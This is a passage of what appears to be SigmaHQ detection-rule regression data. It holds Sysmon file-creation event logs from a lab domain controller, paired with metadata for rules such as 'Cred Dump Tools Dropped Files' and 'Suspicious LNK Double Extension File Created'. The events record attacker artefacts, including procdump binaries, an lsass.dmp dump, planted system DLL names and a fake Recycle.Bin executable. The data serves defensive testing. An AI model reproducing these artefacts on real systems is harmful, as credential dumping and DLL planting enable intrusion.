"C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", "CreationUtcTime": "2025-10-24 23:34:32.250", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:34:34.653476Z" } }, "EventRecordID": 14988, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:34:34.645", "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", "ProcessId": 9612, "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP", "CreationUtcTime": "2025-10-24 23:34:34.645", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:34:34.655191Z" } }, "EventRecordID": 14990, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:34:34.645", "ProcessGuid": 
"5AA13A44-0D08-68FC-DD1D-000000004002", "ProcessId": 9612, "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", "CreationUtcTime": "2025-10-24 23:34:32.250", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml ================================================ id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 0b9ad457-2554-44c1-82c2-d56a99c42377 title: Anydesk Temporary Artefact regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:36:53.996168Z" } }, "EventRecordID": 19025, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:36:53.977", "ProcessGuid": "5AA13A44-523E-68FB-1700-000000004002", "ProcessId": 1276, "Image": 
"C:\\Windows\\System32\\svchost.exe", "TargetFilename": "C:\\Users\\Administrator\\Documents\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx", "CreationUtcTime": "2025-10-24 23:36:52.320", "User": "NT AUTHORITY\\LOCAL SERVICE" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml ================================================ id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb title: EVTX Created In Uncommon Location regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:38:31.938519Z" } }, "EventRecordID": 20972, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:38:31.936", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", 
"TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll", "CreationUtcTime": "2025-10-24 23:38:31.936", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml ================================================ id: 8da08693-5638-4236-87b1-d04b4fcc5e84 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: df6ecb8b-7822-4f4b-b412-08f524b4576c title: Creation Of Non-Existent System DLL regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:39:53.705006Z" } }, "EventRecordID": 22566, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:39:53.699", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb", "CreationUtcTime": "2025-10-24 
23:39:53.699", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml ================================================ id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: ee63c85c-6d51-4d12-ad09-04e25877a947 title: New Custom Shim Database Created regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:41:00.601559Z" } }, "EventRecordID": 23503, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:41:00.589", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\tdh.dll", "CreationUtcTime": "2025-10-24 23:41:00.589", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: 
regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml ================================================ id: 61017761-38ab-4224-a43f-6cc53b67e374 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 13c02350-4177-4e45-ac17-cf7ca628ff5e title: Files With System DLL Name In Unsuspected Locations regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:41:48.497170Z" } }, "EventRecordID": 24322, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:41:48.482", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\bitsadmin.exe", "CreationUtcTime": "2025-10-24 23:41:48.482", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml 
================================================ id: e0123384-7d25-4178-b011-c1d37394d8dc description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d title: Files With System Process Name In Unsuspected Locations regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/d5866ddf-ce8f-4aea-b28e-d96485a20d3d.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.136421Z" } }, "EventRecordID": 26359, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.134", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe", "CreationUtcTime": "2025-10-24 23:43:34.134", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" 
} }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.154339Z" } }, "EventRecordID": 26362, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.145", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier", "CreationUtcTime": "2022-11-03 15:55:14.000", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.160852Z" } }, "EventRecordID": 26366, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.145", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe", "CreationUtcTime": "2025-10-24 23:43:34.145", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": 
"Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.177439Z" } }, "EventRecordID": 26369, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.177", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier", "CreationUtcTime": "2022-11-03 15:55:14.000", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.183790Z" } }, "EventRecordID": 26373, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.178", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe", "CreationUtcTime": "2025-10-24 23:43:34.178", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:43:34.211790Z" } }, "EventRecordID": 26376, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:43:34.209", "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ProcessId": 7680, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier", "CreationUtcTime": "2022-11-03 15:55:14.000", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml ================================================ id: ef67d58b-a7c2-434f-af87-34ae280a2968 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 title: Cred Dump Tools Dropped Files regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { 
"Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:45:24.807660Z" } }, "EventRecordID": 28881, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:45:24.804", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\lsass.dmp", "CreationUtcTime": "2025-10-24 23:45:24.804", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml ================================================ id: 5640730a-30d1-4aca-9ad3-dbb9000bb091 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c title: Potentially Suspicious DMP/HDMP File Creation regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": 
"5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-10T05:14:28.844323Z" } }, "EventRecordID": 18792, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "Public", "UtcTime": "2025-12-10 05:14:28.840", "ProcessGuid": "0197231E-01A8-6939-0811-000000000800", "ProcessId": 8868, "Image": "C:\\WINDOWS\\system32\\certutil.exe", "TargetFilename": "C:\\Users\\Public\\7zip.exe", "CreationUtcTime": "2025-12-10 05:14:28.840", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/info.yml ================================================ id: 27565138-af8e-4c92-956e-586bbc0a3539 description: N/A date: 2025-12-10 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67 title: Legitimate Application Writing Files In Uncommon Location regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_in_uncommon_location/1cf465a1-2609-4c15-9b66-c32dbe4bfd67.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": 
"5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:54:01.546728Z" } }, "EventRecordID": 86290, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:54:01.546", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\evil.doc.lnk", "CreationUtcTime": "2025-10-24 23:54:01.546", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml ================================================ id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 3215aa19-f060-4332-86d5-5602511f3ca8 title: Suspicious LNK Double Extension File Created regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 
0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:52:38.278829Z" } }, "EventRecordID": 74174, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:52:38.276", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\Users\\Public\\persistence.bat", "CreationUtcTime": "2025-10-24 23:52:38.276", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml ================================================ id: 9556b96b-462a-4238-a0bf-5e11ff0408fe description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e title: Suspicious Binaries and Scripts in Public Folder regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { 
"SystemTime": "2025-10-24T23:51:54.709878Z" } }, "EventRecordID": 67705, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-24 23:51:54.705", "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ProcessId": 10048, "Image": "C:\\Windows\\system32\\cmd.exe", "TargetFilename": "C:\\RECYCLERS.BIN\\malware.exe", "CreationUtcTime": "2025-10-24 23:51:54.705", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml ================================================ id: 6d485a4e-83d1-4ead-8173-9fddddb3ba22 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca title: Suspicious File Creation Activity From Fake Recycle.Bin Folder regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca.evtx ================================================ FILE: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 11, "Version": 2, "Level": 4, "Task": 11, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-24T23:50:20.590884Z" } }, "EventRecordID": 53968, 
